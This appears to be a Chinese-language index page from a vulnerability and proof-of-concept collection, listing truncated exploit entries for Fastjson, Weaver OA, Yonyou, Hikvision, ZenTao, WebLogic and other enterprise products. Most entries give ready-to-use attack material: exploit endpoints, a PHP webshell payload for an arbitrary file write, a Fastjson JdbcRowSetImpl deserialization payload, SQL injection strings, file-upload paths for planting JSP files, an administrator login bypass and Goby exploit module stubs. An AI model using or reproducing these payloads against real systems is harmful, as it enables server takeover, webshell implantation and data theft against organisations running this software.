-
FastJson代码执行漏洞(CVE-2...
漏洞描述
Fastjson 是阿里巴巴的开源 JSON 解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON字符串,也可以从 JSON 字符串反序列化到 JavaBean。在 Fastjson 1.2.80 及以下版本中存在反序列化漏洞,攻击者可以在特定依赖下利用此漏洞绕过默认autoType 关闭限制,从而反序列化有安全风险的类。
...
-
GravCMS 未经身份验证的任意 YA...
Grav 是一个快速、简单、灵活的基于文件的 Web 平台。需要零安装。只需解压缩 ZIP 存档,您就已经启动并运行了。
当然,这又是一次给我们0day打猎的机会。您将阅读我们在研究过程中遇到的步骤。
绕过管理员页面保护
我知道我们不会找到任何唾手可得的果实。我不能透露我们客户的名字,但我可以坦率地说,他们拥有一支非常有才华、年轻且积极进取的安全团队。
当我们确...
-
Roxy-WI 未经身份验证的远程代码执...
漏洞分析
漏洞 #1 – 身份验证绕过
从 Roxy GitHub帐户获得 Roxy-WI 源代码后,我完成了应用程序安装并开始检查应用程序。我访问了登录页面来分析安装后的应用程序。在访问登录页面时,我观察到应用程序请求了/app/options.py路径。如果无需身份验证即可访问应用程序中的资源,这是开始分析源代码的好时机。因此,我开始对/app/options.py文件进行攻击性源...
-
TRS-MAS 测试文件 testCom...
TRS-MAS 测试文件 testCommandExecutor.jsp 远程命令执行
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
func init() {
expJson := `{
"Name&...
-
TRS-WAS远程命令执行
poc
"uri": "/mas/sysinfo/testCommandExecutor.jsp?cmdLine={{{cmdLine}}}&workDir=&pathEnv=&libPathEnv=",
-
WebLogic 反序列化远程命令执行路...
poc
/_async/AsyncResponseService
-
华天动力OA任意文件上传漏洞
华天电力协同办公系统结合了先进的管理理念、管理模式、软件技术和网络技术,为用户提供了一个低成本、高效的协同办公和管理平台。睿智的管理者通过使用华天电力协同办公平台,在加强标准化工作流程、加强团队执行力、促进精细化管理和促进业务增长方面取得了良好的效果<br></p><p>华天电力OA中存在任意文件上传漏洞。攻击者可以上传任意文件、获取webshell、控制服务器...
-
安恒明御网关注入漏洞
poc
/webui/?g=aaa_portal_auth_config_reset&type=1
-
帆软1day
poc
/webroot/decision/view/form?op=chartlink&cmd=refresh_relate_data
-
泛微 EOffice10 前台 GETS...
泛微 eoffice10 前台 getshell(eoffice10/version.json):
版本号:http://XXXXXXX:8010/eoffice10/version.json
<form method='post'
action='http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015...
-
泛微E-office do_excel....
泛微E-office do_excel.php任意文件写入漏洞
URL
/WWW/general/charge/charge_list/do_excel.php
Payload
html=<?php system($_POST[pass]);?>
-
泛微OA uploaderOperate...
漏洞详情
/workrelate/plan/util/uploaderOperate.jsp 存在文件上传漏洞
漏洞复现
POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
Host: X.X.X.X
Sec-Ch-Ua: " Not A;Brand";v="99",...
-
泛微OA-0day管理员任意登录
泛微OA-0day管理员任意登录
URL
/mobile/plugin/VerifyQuickLogin.jsp
Payload
identifier=1&language=1&ipaddress=
-
海康威视综合运营管理平台RCE漏洞
海康威视综合运营管理平台RCE漏洞
URL
/bic/ssoService/v1/applyCT
Payload
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b&q...
-
用友FE协作办公平台目录遍历
用友FE协作办公平台 templateOfTaohong_manager.jsp目录遍历
/system/mediafile/templateofTaoHong_manager.jsp?path={{{path}}}
-
用友GRP-U8财务管理软件任意文件上传
用友GRP-U8财务管理软件任意文件上传
/UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=181=1&1=1&1=1&1=1&1=1&...
-
用友时空KSOA软件前台文件上传漏洞
用友时空KSOA软件前台文件上传漏洞
/servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=gmtxj.jsp
-
禅道 v16.5 SQL注入漏洞
poc
POST /zentao/user-login.html HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
account=admin%27+and++updatexml%281%2Cconcat%280x1%2Cuser%28%29%29%2C1%29+and+%271%27%3D%27...
-
红帆医疗云OA医用版前台SQL注入漏洞
poc
/api/switch-value/list?sorts=%5B%7B%22Field%22:%22convert(int,stuff((select%20quotename(name)%20from%20sys.databases%20for%20xml%20path(%27%27),1,0,%27%27))%22%7D%5D&conditions=%5B%5D&_Z...
-
绿盟下一代防火墙 resourse.ph...
package exploits
import (
"fmt"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"gi...
